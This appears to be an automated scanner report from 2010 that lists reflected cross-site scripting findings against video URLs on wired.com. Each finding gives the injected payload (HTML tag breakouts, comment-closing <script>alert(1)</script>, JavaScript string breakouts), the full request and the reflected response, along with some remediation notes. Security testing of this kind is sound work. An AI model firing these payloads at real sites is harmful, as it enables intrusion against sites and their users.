HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:59:39 GMT Date: Mon, 22 Nov 2010 00:54:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e069"><a>59655ba9969 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/6508758570014e069"><a>59655ba9969 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:53 GMT Date: Mon, 22 Nov 2010 00:53:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallows c_6508758570014e069"><a>59655ba9969"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 733e5"><a>6aeef5d110a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video733e5"><a>6aeef5d110a/behind-the-scenes-with-jj-abrams/20039390001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29418 Vary: Accept-Encoding Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:55:29 GMT Date: Mon, 22 Nov 2010 00:50:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video733e5"><a>6aeef5d110a ss_behind-the-scenes-with-jj-abrams c_20039390001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5c545--><script>alert(1)</script>65965458990 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video5c545--><script>alert(1)</script>65965458990/behind-the-scenes-with-jj-abrams/20039390001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29452 Vary: Accept-Encoding Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:56:23 GMT Date: Mon, 22 Nov 2010 00:51:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video5c545--><script>alert(1)</script>65965458990/behind-the-scenes-with-jj-abrams/20039390001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8f3"><a>39cc80102e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-with-jj-abramscb8f3"><a>39cc80102e6/20039390001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:56:25 GMT Date: Mon, 22 Nov 2010 00:51:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-with-jj-abramscb8f3"><a>39cc80102e6 c_20039390001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bead8"-alert(1)-"fa9b5494e92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-with-jj-abramsbead8"-alert(1)-"fa9b5494e92/20039390001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=281 Expires: Mon, 22 Nov 2010 00:57:36 GMT Date: Mon, 22 Nov 2010 00:52:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a135"><a>2745aaf740 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-with-jj-abrams/200393900019a135"><a>2745aaf740 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:57:55 GMT Date: Mon, 22 Nov 2010 00:52:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-with-jj-abrams c_200393900019a135"><a>2745aaf740"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53cca"-alert(1)-"49da715f4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-with-jj-abrams/2003939000153cca"-alert(1)-"49da715f4a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:02 GMT Date: Mon, 22 Nov 2010 00:54:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload d3d6f--><script>alert(1)</script>e2bf1c5c8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videod3d6f--><script>alert(1)</script>e2bf1c5c8cd/calibrate-the-blues-away/4569448001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29435 Vary: Accept-Encoding Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:57:57 GMT Date: Mon, 22 Nov 2010 00:53:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videod3d6f--><script>alert(1)</script>e2bf1c5c8cd/calibrate-the-blues-away/4569448001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee46"><a>33fa741b98d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4ee46"><a>33fa741b98d/calibrate-the-blues-away/4569448001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29400 Vary: Accept-Encoding Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:57:04 GMT Date: Mon, 22 Nov 2010 00:52:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4ee46"><a>33fa741b98d ss_calibrate-the-blues-away c_4569448001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84bfb"><a>7582fbe354d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/calibrate-the-blues-away84bfb"><a>7582fbe354d/4569448001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:21 GMT Date: Mon, 22 Nov 2010 00:53:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_calibrate-the-blues-away84bfb"><a>7582fbe354d c_4569448001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37678"-alert(1)-"f1e2422602e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/calibrate-the-blues-away37678"-alert(1)-"f1e2422602e/4569448001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:17 GMT Date: Mon, 22 Nov 2010 00:54:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b20eb"><a>219a2b9005f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/calibrate-the-blues-away/4569448001b20eb"><a>219a2b9005f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:59:29 GMT Date: Mon, 22 Nov 2010 00:54:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_calibrate-the-blues-away c_4569448001b20eb"><a>219a2b9005f"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bba80"-alert(1)-"91f95a021a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/calibrate-the-blues-away/4569448001bba80"-alert(1)-"91f95a021a9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:59:59 GMT Date: Mon, 22 Nov 2010 00:55:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a10f"><a>9f9a6b9c5f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video5a10f"><a>9f9a6b9c5f4/culture HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29255 Vary: Accept-Encoding Cache-Control: max-age=290 Expires: Mon, 22 Nov 2010 00:52:16 GMT Date: Mon, 22 Nov 2010 00:47:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video5a10f"><a>9f9a6b9c5f4 ss_culture"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d97c"><a>59487338fe7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/culture7d97c"><a>59487338fe7 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:52 GMT Date: Mon, 22 Nov 2010 00:48:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_culture7d97c"><a>59487338fe7"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fd0d"-alert(1)-"6f7deddbb2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/culture2fd0d"-alert(1)-"6f7deddbb2f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:54:31 GMT Date: Mon, 22 Nov 2010 00:49:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca37"><a>22302db7157 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video5ca37"><a>22302db7157/events HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29340 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:14 GMT Date: Mon, 22 Nov 2010 00:47:14 GMT Connection: close
